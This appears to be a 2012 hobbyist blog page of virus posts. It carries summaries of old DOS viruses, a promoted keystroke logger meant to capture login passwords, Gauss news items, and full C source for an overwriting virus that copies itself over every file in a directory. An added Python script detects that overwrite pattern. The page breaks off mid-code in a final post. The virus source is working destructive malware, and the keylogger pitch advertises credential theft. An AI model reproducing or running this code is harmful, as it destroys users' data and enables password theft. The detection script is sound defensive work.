Showing posts with label Virus. Show all posts

Thursday, August 16, 2012

GOLD-BUG Virus

Virus Name:  GOLD-BUG
Aliases:     AU, GOLD, GOLD-FEVER, GOLD-MINE
V Status:    New, Research
Discovery:   January, 1994
Symptoms:    CMOS checksum failure; Creates files with no extension; Modem answers on 7th ring; BSC but it is hidden; Most virus scanners fail to run or are deleted; CHKLIST.??? files deleted.
Origin:      USA
Eff Length:  1,024 Bytes
Type Code:   SBERaRbReX - Spawning Color Video Resident and Extended HMA Memory Resident Boot-Sector and Master-Sector Infector
Detection Method:  None
Removal Instructions:  See Below


Wednesday, August 15, 2012

FIREFLY - More than A Smart Virus

Firefly is an encrypted, memory-resident virus which infects .COM files on load. It incorporates code from the Proto-T, LokJaw and YB-X viruses and, when in memory, attacks a large selection of anti-virus programs as they are executed. Anti-virus programs identified by Firefly's execute/load handler are deleted.
Firefly incorporates simple code from previous issues of the newsletter designed to de-install generic VSAFE resident virus activity filters designed for Microsoft by Central Point Software.



Tuesday, August 14, 2012

Anti-Debugger Techniques


-THE-MASTER-HIDES-BEHIND-THE-MASK-


        Ok, now the AV can not even get your virus to infect their bait
files, and if they do finally manage,  they will have great problems in
getting a complete,  accurate view of what they are dealing with.



--By Sibidharan




KEYSPY : Password Capturing Made Easy


A little something I cooked up when I was bored one afternoon ...

KEYSPY is a program which is intended to capture keystrokes when a password-protected or login program is run and save them in a hidden file in the root directory. This will enable the resourceful user to find plenty of login names and passwords.

By Sibidharan v 0.90



Monday, August 13, 2012

BACKDOORS on DOS


The information in this article concerns the backdoors in MS-DOS and BIOS that can be used and abused by a virus for its own ends! Most of them concern the Int21h DOS services interrupt and Int13h Disk services.


Sunday, August 12, 2012

Virus found in Middle East that can spy on finance transactions: Kaspersky


A new cyber surveillance virus has been found in the Middle East that can spy on financial transactions, email and social networking activity, according to a leading computer security firm, Kaspersky Lab.

Dubbed Gauss, the virus may also be capable of attacking critical infrastructure and was built in the same laboratories as Stuxnet, the computer worm widely believed to have been used by the United States and Israel to attack Iran's nuclear program, Kaspersky Lab said on Thursday.

Saturday, August 11, 2012

Key facts about virus that can steal banking credentials

A new computer virus, dubbed Gauss, has been discovered in the Middle East. Researchers say it can steal banking credentials and hijack login information for social networking sites, email and instant messaging accounts.

Cyber security firm Kaspersky Lab said Gauss is the work of the same "factory" or "factories" that built the Stuxnet worm, which attacked Iran's nuclear program. Here are some key facts about Gauss, according to Kaspersky Lab.

Sunday, July 1, 2012

Logic Bomb. Actually a virus!

I am in no way responsible for execution of this bomb. Viruses of this sort are called logic bombs. They replicate themselves into other files, injecting themselves byte by byte into the other files in the programmed directory. Windows-based C source code.

Should be used for educational purpose only.
Code:
#include<stdio.h>
#include<dos.h>
#include<dir.h>
#include<fcntl.h>
#include<conio.h>
#include<string.h>
void ext_rename(char file[])
 {
 char old[1000],ext[]="exe";
 int i,status;
 strcpy(file,old);
 for(i=0;i<strlen(file);i++)
  {
   if(file[i]=='.')
    {
     file[++i]='\0';
     break;
    }
   }
  strcat(file,ext);
  rename(old,file);
}
void main(int argc,char* argv[])
{
 char buf[512];
 char old[1000],ext[]="exe";
 int i,status;
 int source,target,byt,done;
 struct ffblk ffblk;
 clrscr();
 textcolor(BLUE);
 cprintf("--------------------------------------------------------------------------");
 printf("\nVirus: Logic Bomb 1.0\nProgrammer: SIBIDHARAN N\n");
 cprintf("--------------------------------------------------------------------------");
 textcolor(GREEN);
 printf("\n");
 cprintf("\nPress any key to start Injecting..");
 getch();
 done = findfirst("*.*",&ffblk,0);
while(!done)
{
  printf("\n");
  textcolor(YELLOW);
  cprintf(" %s ", ffblk.ff_name);
  printf("is converted into a");
  textcolor(RED);
  cprintf(" Logicbomb");
  source=open(argv[0],O_RDONLY|O_BINARY);
  target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONLY);
  while(1)
   {
     byt=read(source,buf,512);
     if(byt>0)
     write(target,buf,byt);
      else
       break;
   }
  close(source);
  close(target);
  done = findnext(&ffblk);
 }

getch();
}
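
Seen from the defender's side, the program above leaves a recognizable trace: every file in the directory ends up holding the same bytes, whatever its extension. The following is an added example, not part of the original post, that groups files by SHA-256 and reports clusters sharing one MZ executable image under mismatched extensions. The function names, the `min_group` threshold, the extension list and the sample directory are assumptions constructed for illustration.

```python
import hashlib
import os
import tempfile
from collections import defaultdict

EXEC_EXTS = {".exe", ".com", ".dll", ".sys", ".scr"}  # assumed "normal" extensions

def sha256_file(path, chunk=65536):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def find_overwrite_clusters(directory, min_group=3):
    """Return clusters of identical files that look like a mass overwrite."""
    groups = defaultdict(list)
    for entry in os.scandir(directory):
        if entry.is_file(follow_symlinks=False) and entry.stat().st_size > 0:
            groups[sha256_file(entry.path)].append(entry.name)
    findings = []
    for digest, names in groups.items():
        exts = {os.path.splitext(n)[1].lower() for n in names}
        with open(os.path.join(directory, names[0]), "rb") as f:
            is_mz = f.read(2) == b"MZ"
        # Identical bytes under several unrelated extensions, starting with an
        # executable header, is the residue of a self-copying overwriter.
        if len(names) >= min_group and len(exts) >= 2 and is_mz:
            odd = sorted(n for n in names
                         if os.path.splitext(n)[1].lower() not in EXEC_EXTS)
            findings.append({"sha256": digest, "files": sorted(names),
                             "non_exec_names": odd})
    return findings

def demo():
    # Constructed sample directory: three files hold the same placeholder
    # "MZ" image (not a real program); one text file is untouched.
    with tempfile.TemporaryDirectory() as d:
        image = b"MZ" + b"\x00" * 510
        for name in ("TOOL.EXE", "REPORT.DOC", "NOTES.TXT"):
            with open(os.path.join(d, name), "wb") as f:
                f.write(image)
        with open(os.path.join(d, "README.TXT"), "wb") as f:
            f.write(b"plain text, untouched\r\n")
        return find_overwrite_clusters(d)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Files listed under `non_exec_names` are the ones to restore from backup; the shared hash can then be searched for across other directories and hosts.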

Not Actually A Virus

This is not actually a virus, but it is being detected as one. The reasons are quoted below.

Code:
#include<stdio.h>
#include<conio.h>
union abc